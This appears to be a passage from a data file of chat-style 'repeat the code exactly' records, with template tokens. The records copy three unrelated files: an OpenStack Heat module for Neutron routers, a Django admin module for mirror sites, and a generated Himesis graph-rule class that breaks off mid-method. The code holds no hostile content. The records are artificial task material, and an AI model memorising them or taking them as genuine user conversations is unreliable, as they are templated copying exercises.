self).validate()\n subnet_id = self.properties.get('subnet_id')\n port_id = self.properties.get('port_id')\n if subnet_id and port_id:\n raise exception.ResourcePropertyConflict('subnet_id', 'port_id')\n if not subnet_id and not port_id:\n msg = 'Either subnet_id or port_id must be specified.'\n raise exception.StackValidationFailed(message=msg)\n\n def handle_create(self):\n router_id = self.properties.get('router_id')\n key = 'subnet_id'\n value = self.properties.get(key)\n if not value:\n key = 'port_id'\n value = self.properties.get(key)\n self.neutron().add_interface_router(\n router_id,\n {key: value})\n self.resource_id_set('%s:%s=%s' % (router_id, key, value))\n\n def handle_delete(self):\n if not self.resource_id:\n return\n client = self.neutron()\n tokens = self.resource_id.replace('=', ':').split(':')\n if len(tokens) == 2: # compatible with old data\n tokens.insert(1, 'subnet_id')\n (router_id, key, value) = tokens\n try:\n client.remove_interface_router(\n router_id,\n {key: value})\n except NeutronClientException as ex:\n if ex.status_code != 404:\n raise ex\n\n\nclass RouterGateway(neutron.NeutronResource):\n properties_schema = {'router_id': {'Type': 'String',\n 'Required': True},\n 'network_id': {'Type': 'String',\n 'Required': True}}\n\n def add_dependencies(self, deps):\n super(RouterGateway, self).add_dependencies(deps)\n for resource in self.stack.itervalues():\n # depend on any RouterInterface in this template with the same\n # router_id as this router_id\n if (resource.has_interface('OS::Neutron::RouterInterface') and\n resource.properties.get('router_id') ==\n self.properties.get('router_id')):\n deps += (self, resource)\n # depend on any subnet in this template with the same network_id\n # as this network_id, as the gateway implicitly creates a port\n # on that subnet\n elif (resource.has_interface('OS::Neutron::Subnet') and\n resource.properties.get('network_id') ==\n self.properties.get('network_id')):\n deps += (self, resource)\n\n def handle_create(self):\n router_id = self.properties.get('router_id')\n network_id = neutronV20.find_resourceid_by_name_or_id(\n self.neutron(),\n 'network',\n self.properties.get('network_id'))\n self.neutron().add_gateway_router(\n router_id,\n {'network_id': network_id})\n self.resource_id_set('%s:%s' % (router_id, network_id))\n\n def handle_delete(self):\n if not self.resource_id:\n return\n client = self.neutron()\n (router_id, network_id) = self.resource_id.split(':')\n try:\n client.remove_gateway_router(router_id)\n except NeutronClientException as ex:\n if ex.status_code != 404:\n raise ex\n\n\ndef resource_mapping():\n if clients.neutronclient is None:\n return {}\n\n return {\n 'OS::Neutron::Router': Router,\n 'OS::Neutron::RouterInterface': RouterInterface,\n 'OS::Neutron::RouterGateway': RouterGateway,\n }\n```\nKeep all formatting and sequence.",
"role": "user"
}
] |
[
{
"content": "Repeat the code exactly:\n<|memory_start|>```python\n# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom heat.common import exception\nfrom heat.engine import clients\nfrom heat.engine.resources.neutron import neutron\nfrom heat.engine import scheduler\n\nif clients.neutronclient is not None:\n from neutronclient.common.exceptions import NeutronClientException\n from neutronclient.neutron import v2_0 as neutronV20\n\nfrom heat.openstack.common import log as logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass Router(neutron.NeutronResource):\n properties_schema = {'name': {'Type': 'String'},\n 'value_specs': {'Type': 'Map',\n 'Default': {}},\n 'admin_state_up': {'Type': 'Boolean',\n 'Default': True}}\n attributes_schema = {\n \"status\": _(\"The status of the router.\"),\n \"external_gateway_info\": _(\"Gateway network for the router.\"),\n \"name\": _(\"Friendly name of the router.\"),\n \"admin_state_up\": _(\"Administrative state of the router.\"),\n \"tenant_id\": _(\"Tenant owning the router.\"),\n \"show\": _(\"All attributes.\"),\n }\n\n def handle_create(self):\n props = self.prepare_properties(\n self.properties,\n self.physical_resource_name())\n router = self.neutron().create_router({'router': props})['router']\n self.resource_id_set(router['id'])\n\n def _show_resource(self):\n return self.neutron().show_router(\n self.resource_id)['router']\n\n def check_create_complete(self, *args):\n attributes = self._show_resource()\n return self.is_built(attributes)\n\n def handle_delete(self):\n client = self.neutron()\n try:\n client.delete_router(self.resource_id)\n except NeutronClientException as ex:\n if ex.status_code != 404:\n raise ex\n else:\n return scheduler.TaskRunner(self._confirm_delete)()\n\n\nclass RouterInterface(neutron.NeutronResource):\n properties_schema = {\n 'router_id': {\n 'Type': 'String',\n 'Required': True,\n 'Description': _('The router id.')},\n 'subnet_id': {\n 'Type': 'String',\n 'Description': _('The subnet id, either '\n 'subnet_id or port_id should be specified.')},\n 'port_id': {\n 'Type': 'String',\n 'Description': _('The port id, either '\n 'subnet_id or port_id should be specified.')}}\n\n def validate(self):\n '''\n Validate any of the provided params\n '''\n super(RouterInterface, self).validate()\n subnet_id = self.properties.get('subnet_id')\n port_id = self.properties.get('port_id')\n if subnet_id and port_id:\n raise exception.ResourcePropertyConflict('subnet_id', 'port_id')\n if not subnet_id and not port_id:\n msg = 'Either subnet_id or port_id must be specified.'\n raise exception.StackValidationFailed(message=msg)\n\n def handle_create(self):\n router_id = self.properties.get('router_id')\n key = 'subnet_id'\n value = self.properties.get(key)\n if not value:\n key = 'port_id'\n value = self.properties.get(key)\n self.neutron().add_interface_router(\n router_id,\n {key: value})\n self.resource_id_set('%s:%s=%s' % (router_id, key, value))\n\n def handle_delete(self):\n if not self.resource_id:\n return\n client = self.neutron()\n tokens = self.resource_id.replace('=', ':').split(':')\n if len(tokens) == 2: # compatible with old data\n tokens.insert(1, 'subnet_id')\n (router_id, key, value) = tokens\n try:\n client.remove_interface_router(\n router_id,\n {key: value})\n except NeutronClientException as ex:\n if ex.status_code != 404:\n raise ex\n\n\nclass RouterGateway(neutron.NeutronResource):\n properties_schema = {'router_id': {'Type': 'String',\n 'Required': True},\n 'network_id': {'Type': 'String',\n 'Required': True}}\n\n def add_dependencies(self, deps):\n super(RouterGateway, self).add_dependencies(deps)\n for resource in self.stack.itervalues():\n # depend on any RouterInterface in this template with the same\n # router_id as this router_id\n if (resource.has_interface('OS::Neutron::RouterInterface') and\n resource.properties.get('router_id') ==\n self.properties.get('router_id')):\n deps += (self, resource)\n # depend on any subnet in this template with the same network_id\n # as this network_id, as the gateway implicitly creates a port\n # on that subnet\n elif (resource.has_interface('OS::Neutron::Subnet') and\n resource.properties.get('network_id') ==\n self.properties.get('network_id')):\n deps += (self, resource)\n\n def handle_create(self):\n router_id = self.properties.get('router_id')\n network_id = neutronV20.find_resourceid_by_name_or_id(\n self.neutron(),\n 'network',\n self.properties.get('network_id'))\n self.neutron().add_gateway_router(\n router_id,\n {'network_id': network_id})\n self.resource_id_set('%s:%s' % (router_id, network_id))\n\n def handle_delete(self):\n if not self.resource_id:\n return\n client = self.neutron()\n (router_id, network_id) = self.resource_id.split(':')\n try:\n client.remove_gateway_router(router_id)\n except NeutronClientException as ex:\n if ex.status_code != 404:\n raise ex\n\n\ndef resource_mapping():\n if clients.neutronclient is None:\n return {}\n\n return {\n 'OS::Neutron::Router': Router,\n 'OS::Neutron::RouterInterface': RouterInterface,\n 'OS::Neutron::RouterGateway': RouterGateway,\n }\n```<|memory_end|>\nKeep all formatting and sequence.",
"role": "user"
}
] |
```python
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from heat.common import exception
from heat.engine import clients
from heat.engine.resources.neutron import neutron
from heat.engine import scheduler
if clients.neutronclient is not None:
from neutronclient.common.exceptions import NeutronClientException
from neutronclient.neutron import v2_0 as neutronV20
from heat.openstack.common import log as logging
logger = logging.getLogger(__name__)
class Router(neutron.NeutronResource):
properties_schema = {'name': {'Type': 'String'},
'value_specs': {'Type': 'Map',
'Default': {}},
'admin_state_up': {'Type': 'Boolean',
'Default': True}}
attributes_schema = {
"status": _("The status of the router."),
"external_gateway_info": _("Gateway network for the router."),
"name": _("Friendly name of the router."),
"admin_state_up": _("Administrative state of the router."),
"tenant_id": _("Tenant owning the router."),
"show": _("All attributes."),
}
def handle_create(self):
props = self.prepare_properties(
self.properties,
self.physical_resource_name())
router = self.neutron().create_router({'router': props})['router']
self.resource_id_set(router['id'])
def _show_resource(self):
return self.neutron().show_router(
self.resource_id)['router']
def check_create_complete(self, *args):
attributes = self._show_resource()
return self.is_built(attributes)
def handle_delete(self):
client = self.neutron()
try:
client.delete_router(self.resource_id)
except NeutronClientException as ex:
if ex.status_code != 404:
raise ex
else:
return scheduler.TaskRunner(self._confirm_delete)()
class RouterInterface(neutron.NeutronResource):
properties_schema = {
'router_id': {
'Type': 'String',
'Required': True,
'Description': _('The router id.')},
'subnet_id': {
'Type': 'String',
'Description': _('The subnet id, either '
'subnet_id or port_id should be specified.')},
'port_id': {
'Type': 'String',
'Description': _('The port id, either '
'subnet_id or port_id should be specified.')}}
def validate(self):
'''
Validate any of the provided params
'''
super(RouterInterface, self).validate()
subnet_id = self.properties.get('subnet_id')
port_id = self.properties.get('port_id')
if subnet_id and port_id:
raise exception.ResourcePropertyConflict('subnet_id', 'port_id')
if not subnet_id and not port_id:
msg = 'Either subnet_id or port_id must be specified.'
raise exception.StackValidationFailed(message=msg)
def handle_create(self):
router_id = self.properties.get('router_id')
key = 'subnet_id'
value = self.properties.get(key)
if not value:
key = 'port_id'
value = self.properties.get(key)
self.neutron().add_interface_router(
router_id,
{key: value})
self.resource_id_set('%s:%s=%s' % (router_id, key, value))
def handle_delete(self):
if not self.resource_id:
return
client = self.neutron()
tokens = self.resource_id.replace('=', ':').split(':')
if len(tokens) == 2: # compatible with old data
tokens.insert(1, 'subnet_id')
(router_id, key, value) = tokens
try:
client.remove_interface_router(
router_id,
{key: value})
except NeutronClientException as ex:
if ex.status_code != 404:
raise ex
class RouterGateway(neutron.NeutronResource):
properties_schema = {'router_id': {'Type': 'String',
'Required': True},
'network_id': {'Type': 'String',
'Required': True}}
def add_dependencies(self, deps):
super(RouterGateway, self).add_dependencies(deps)
for resource in self.stack.itervalues():
# depend on any RouterInterface in this template with the same
# router_id as this router_id
if (resource.has_interface('OS::Neutron::RouterInterface') and
resource.properties.get('router_id') ==
self.properties.get('router_id')):
deps += (self, resource)
# depend on any subnet in this template with the same network_id
# as this network_id, as the gateway implicitly creates a port
# on that subnet
elif (resource.has_interface('OS::Neutron::Subnet') and
resource.properties.get('network_id') ==
self.properties.get('network_id')):
deps += (self, resource)
def handle_create(self):
router_id = self.properties.get('router_id')
network_id = neutronV20.find_resourceid_by_name_or_id(
self.neutron(),
'network',
self.properties.get('network_id'))
self.neutron().add_gateway_router(
router_id,
{'network_id': network_id})
self.resource_id_set('%s:%s' % (router_id, network_id))
def handle_delete(self):
if not self.resource_id:
return
client = self.neutron()
(router_id, network_id) = self.resource_id.split(':')
try:
client.remove_gateway_router(router_id)
except NeutronClientException as ex:
if ex.status_code != 404:
raise ex
def resource_mapping():
if clients.neutronclient is None:
return {}
return {
'OS::Neutron::Router': Router,
'OS::Neutron::RouterInterface': RouterInterface,
'OS::Neutron::RouterGateway': RouterGateway,
}
```
|
[
{
"content": "Repeat the code exactly as the original, including blank lines:\n```python\nimport re\nfrom urlparse import urlparse, urlunsplit\n\nfrom django import forms\nfrom django.contrib import admin\n\nfrom .models import Mirror, MirrorProtocol, MirrorUrl, MirrorRsync\n\nclass MirrorUrlForm(forms.ModelForm):\n class Meta:\n model = MirrorUrl\n def clean_url(self):\n # is this a valid-looking URL?\n url_parts = urlparse(self.cleaned_data[\"url\"])\n if not url_parts.scheme:\n raise forms.ValidationError(\"No URL scheme (protocol) provided.\")\n if not url_parts.netloc:\n raise forms.ValidationError(\"No URL host provided.\")\n if url_parts.params or url_parts.query or url_parts.fragment:\n raise forms.ValidationError(\n \"URL parameters, query, and fragment elements are not supported.\")\n # ensure we always save the URL with a trailing slash\n path = url_parts.path\n if not path.endswith('/'):\n path += '/'\n url = urlunsplit((url_parts.scheme, url_parts.netloc, path, '', ''))\n return url\n\nclass MirrorUrlInlineAdmin(admin.TabularInline):\n model = MirrorUrl\n form = MirrorUrlForm\n readonly_fields = ('protocol', 'has_ipv4', 'has_ipv6')\n extra = 3\n\n# ripped off from django.forms.fields, adding netmask ability\nIPV4NM_RE = re.compile(r'^(25[0-5]|2[0-4]\\d|[0-1]?\\d?\\d)(\\.(25[0-5]|2[0-4]\\d|[0-1]?\\d?\\d)){3}(/(\\d|[1-2]\\d|3[0-2])){0,1}$')\n\nclass IPAddressNetmaskField(forms.fields.RegexField):\n default_error_messages = {\n 'invalid': u'Enter a valid IPv4 address, possibly including netmask.',\n }\n\n def __init__(self, *args, **kwargs):\n super(IPAddressNetmaskField, self).__init__(IPV4NM_RE, *args, **kwargs)\n\nclass MirrorRsyncForm(forms.ModelForm):\n class Meta:\n model = MirrorRsync\n ip = IPAddressNetmaskField(label='IP')\n\nclass MirrorRsyncInlineAdmin(admin.TabularInline):\n model = MirrorRsync\n form = MirrorRsyncForm\n extra = 2\n\nclass MirrorAdminForm(forms.ModelForm):\n class Meta:\n model = Mirror\n upstream = forms.ModelChoiceField(\n queryset=Mirror.objects.filter(tier__gte=0, tier__lte=1),\n required=False)\n\nclass MirrorAdmin(admin.ModelAdmin):\n form = MirrorAdminForm\n list_display = ('name', 'tier', 'country', 'active', 'public',\n 'isos', 'admin_email', 'alternate_email')\n list_filter = ('tier', 'active', 'public', 'country')\n search_fields = ('name', 'admin_email', 'alternate_email')\n inlines = [\n MirrorUrlInlineAdmin,\n MirrorRsyncInlineAdmin,\n ]\n\nclass MirrorProtocolAdmin(admin.ModelAdmin):\n list_display = ('protocol', 'is_download', 'default')\n list_filter = ('is_download', 'default')\n\nadmin.site.register(Mirror, MirrorAdmin)\nadmin.site.register(MirrorProtocol, MirrorProtocolAdmin)\n\n# vim: set ts=4 sw=4 et:\n```",
"role": "user"
}
] |
[
{
"content": "Repeat the code exactly as the original, including blank lines:\n<|memory_start|>```python\nimport re\nfrom urlparse import urlparse, urlunsplit\n\nfrom django import forms\nfrom django.contrib import admin\n\nfrom .models import Mirror, MirrorProtocol, MirrorUrl, MirrorRsync\n\nclass MirrorUrlForm(forms.ModelForm):\n class Meta:\n model = MirrorUrl\n def clean_url(self):\n # is this a valid-looking URL?\n url_parts = urlparse(self.cleaned_data[\"url\"])\n if not url_parts.scheme:\n raise forms.ValidationError(\"No URL scheme (protocol) provided.\")\n if not url_parts.netloc:\n raise forms.ValidationError(\"No URL host provided.\")\n if url_parts.params or url_parts.query or url_parts.fragment:\n raise forms.ValidationError(\n \"URL parameters, query, and fragment elements are not supported.\")\n # ensure we always save the URL with a trailing slash\n path = url_parts.path\n if not path.endswith('/'):\n path += '/'\n url = urlunsplit((url_parts.scheme, url_parts.netloc, path, '', ''))\n return url\n\nclass MirrorUrlInlineAdmin(admin.TabularInline):\n model = MirrorUrl\n form = MirrorUrlForm\n readonly_fields = ('protocol', 'has_ipv4', 'has_ipv6')\n extra = 3\n\n# ripped off from django.forms.fields, adding netmask ability\nIPV4NM_RE = re.compile(r'^(25[0-5]|2[0-4]\\d|[0-1]?\\d?\\d)(\\.(25[0-5]|2[0-4]\\d|[0-1]?\\d?\\d)){3}(/(\\d|[1-2]\\d|3[0-2])){0,1}$')\n\nclass IPAddressNetmaskField(forms.fields.RegexField):\n default_error_messages = {\n 'invalid': u'Enter a valid IPv4 address, possibly including netmask.',\n }\n\n def __init__(self, *args, **kwargs):\n super(IPAddressNetmaskField, self).__init__(IPV4NM_RE, *args, **kwargs)\n\nclass MirrorRsyncForm(forms.ModelForm):\n class Meta:\n model = MirrorRsync\n ip = IPAddressNetmaskField(label='IP')\n\nclass MirrorRsyncInlineAdmin(admin.TabularInline):\n model = MirrorRsync\n form = MirrorRsyncForm\n extra = 2\n\nclass MirrorAdminForm(forms.ModelForm):\n class Meta:\n model = Mirror\n upstream = forms.ModelChoiceField(\n queryset=Mirror.objects.filter(tier__gte=0, tier__lte=1),\n required=False)\n\nclass MirrorAdmin(admin.ModelAdmin):\n form = MirrorAdminForm\n list_display = ('name', 'tier', 'country', 'active', 'public',\n 'isos', 'admin_email', 'alternate_email')\n list_filter = ('tier', 'active', 'public', 'country')\n search_fields = ('name', 'admin_email', 'alternate_email')\n inlines = [\n MirrorUrlInlineAdmin,\n MirrorRsyncInlineAdmin,\n ]\n\nclass MirrorProtocolAdmin(admin.ModelAdmin):\n list_display = ('protocol', 'is_download', 'default')\n list_filter = ('is_download', 'default')\n\nadmin.site.register(Mirror, MirrorAdmin)\nadmin.site.register(MirrorProtocol, MirrorProtocolAdmin)\n\n# vim: set ts=4 sw=4 et:\n```<|memory_end|>",
"role": "user"
}
] |
```python
import re
from urlparse import urlparse, urlunsplit
from django import forms
from django.contrib import admin
from .models import Mirror, MirrorProtocol, MirrorUrl, MirrorRsync
class MirrorUrlForm(forms.ModelForm):
class Meta:
model = MirrorUrl
def clean_url(self):
# is this a valid-looking URL?
url_parts = urlparse(self.cleaned_data["url"])
if not url_parts.scheme:
raise forms.ValidationError("No URL scheme (protocol) provided.")
if not url_parts.netloc:
raise forms.ValidationError("No URL host provided.")
if url_parts.params or url_parts.query or url_parts.fragment:
raise forms.ValidationError(
"URL parameters, query, and fragment elements are not supported.")
# ensure we always save the URL with a trailing slash
path = url_parts.path
if not path.endswith('/'):
path += '/'
url = urlunsplit((url_parts.scheme, url_parts.netloc, path, '', ''))
return url
class MirrorUrlInlineAdmin(admin.TabularInline):
model = MirrorUrl
form = MirrorUrlForm
readonly_fields = ('protocol', 'has_ipv4', 'has_ipv6')
extra = 3
# ripped off from django.forms.fields, adding netmask ability
IPV4NM_RE = re.compile(r'^(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}(/(\d|[1-2]\d|3[0-2])){0,1}$')
class IPAddressNetmaskField(forms.fields.RegexField):
default_error_messages = {
'invalid': u'Enter a valid IPv4 address, possibly including netmask.',
}
def __init__(self, *args, **kwargs):
super(IPAddressNetmaskField, self).__init__(IPV4NM_RE, *args, **kwargs)
class MirrorRsyncForm(forms.ModelForm):
class Meta:
model = MirrorRsync
ip = IPAddressNetmaskField(label='IP')
class MirrorRsyncInlineAdmin(admin.TabularInline):
model = MirrorRsync
form = MirrorRsyncForm
extra = 2
class MirrorAdminForm(forms.ModelForm):
class Meta:
model = Mirror
upstream = forms.ModelChoiceField(
queryset=Mirror.objects.filter(tier__gte=0, tier__lte=1),
required=False)
class MirrorAdmin(admin.ModelAdmin):
form = MirrorAdminForm
list_display = ('name', 'tier', 'country', 'active', 'public',
'isos', 'admin_email', 'alternate_email')
list_filter = ('tier', 'active', 'public', 'country')
search_fields = ('name', 'admin_email', 'alternate_email')
inlines = [
MirrorUrlInlineAdmin,
MirrorRsyncInlineAdmin,
]
class MirrorProtocolAdmin(admin.ModelAdmin):
list_display = ('protocol', 'is_download', 'default')
list_filter = ('is_download', 'default')
admin.site.register(Mirror, MirrorAdmin)
admin.site.register(MirrorProtocol, MirrorProtocolAdmin)
# vim: set ts=4 sw=4 et:
```
|
[
{
"content": "Repeat the following code:\n```python\nfrom core.himesis import Himesis, HimesisPreConditionPatternLHS\n\nclass HM5ThenClausePart2CompleteLHS(HimesisPreConditionPatternLHS):\n def __init__(self):\n \"\"\"\n Creates the himesis graph representing the AToM3 model HM5ThenClausePart2CompleteLHS.\n \"\"\"\n # Flag this instance as compiled now\n self.is_compiled = True\n \n super(HM5ThenClausePart2CompleteLHS, self).__init__(name='HM5ThenClausePart2CompleteLHS', num_nodes=5, edges=[])\n \n # Add the edges\n self.add_edges([[3, 1], [4, 2], [0, 3], [0, 4]])\n # Set the graph attributes\n self[\"mm__\"] = ['MT_pre__GM2AUTOSAR_MM', 'MoTifRule']\n self[\"MT_constraint__\"] = \"\"\"if PreNode('4')['associationType']=='softwareComposition' and PreNode('5')['associationType']=='softwareComposition':\n return True\nreturn False\n\"\"\"\n self[\"name\"] = \"\"\"\"\"\"\n self[\"GUID__\"] = 2625040599713433069\n \n # Set the node attributes\n self.vs[0][\"MT_pre__name\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[0][\"MT_subtypeMatching__\"] = False\n self.vs[0][\"MT_pre__classtype\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[0][\"MT_pivotIn__\"] = \"\"\"element1\"\"\"\n self.vs[0][\"MT_label__\"] = \"\"\"1\"\"\"\n self.vs[0][\"mm__\"] = \"\"\"MT_pre__System\"\"\"\n self.vs[0][\"MT_subtypes__\"] = []\n self.vs[0][\"MT_dirty__\"] = False\n self.vs[0][\"MT_pre__cardinality\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[0][\"GUID__\"] = 8091276301164502443\n self.vs[1][\"MT_pre__name\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[1][\"MT_subtypeMatching__\"] = False\n self.vs[1][\"MT_pre__classtype\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[1][\"MT_pivotIn__\"] = \"\"\"element2\"\"\"\n self.vs[1][\"MT_label__\"] = \"\"\"2\"\"\"\n self.vs[1][\"mm__\"] = \"\"\"MT_pre__SoftwareComposition\"\"\"\n self.vs[1][\"MT_subtypes__\"] = []\n self.vs[1][\"MT_dirty__\"] = False\n self.vs[1][\"MT_pre__cardinality\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[1][\"GUID__\"] = 7433647115890205089\n self.vs[2][\"MT_pre__name\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[2][\"MT_subtypeMatching__\"] = False\n self.vs[2][\"MT_pre__classtype\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[2][\"MT_label__\"] = \"\"\"3\"\"\"\n self.vs[2][\"mm__\"] = \"\"\"MT_pre__SoftwareComposition\"\"\"\n self.vs[2][\"MT_subtypes__\"] = []\n self.vs[2][\"MT_dirty__\"] = False\n self.vs[2][\"MT_pre__cardinality\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[2][\"GUID__\"] = 2267431976090093383\n self.vs[3][\"MT_subtypeMatching__\"] = False\n self.vs[3][\"MT_pre__associationType\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[3][\"MT_label__\"] = \"\"\"4\"\"\"\n self.vs[3][\"mm__\"] = \"\"\"MT_pre__directLink_T\"\"\"\n self.vs[3][\"MT_subtypes__\"] = []\n self.vs[3][\"MT_dirty__\"] = False\n self.vs[3][\"GUID__\"] = 7971122764903685858\n self.vs[4][\"MT_subtypeMatching__\"] = False\n self.vs[4][\"MT_pre__associationType\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[4][\"MT_label__\"] = \"\"\"5\"\"\"\n self.vs[4][\"mm__\"] = \"\"\"MT_pre__directLink_T\"\"\"\n self.vs[4][\"MT_subtypes__\"] = []\n self.vs[4][\"MT_dirty__\"] = False\n self.vs[4][\"GUID__\"] = 9086016569480805560\n\n def eval_name1(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def eval_classtype1(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def eval_cardinality1(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def eval_name2(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def eval_classtype2(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def eval_cardinality2(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def eval_name3(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def eval_classtype3(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def eval_cardinality3(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n 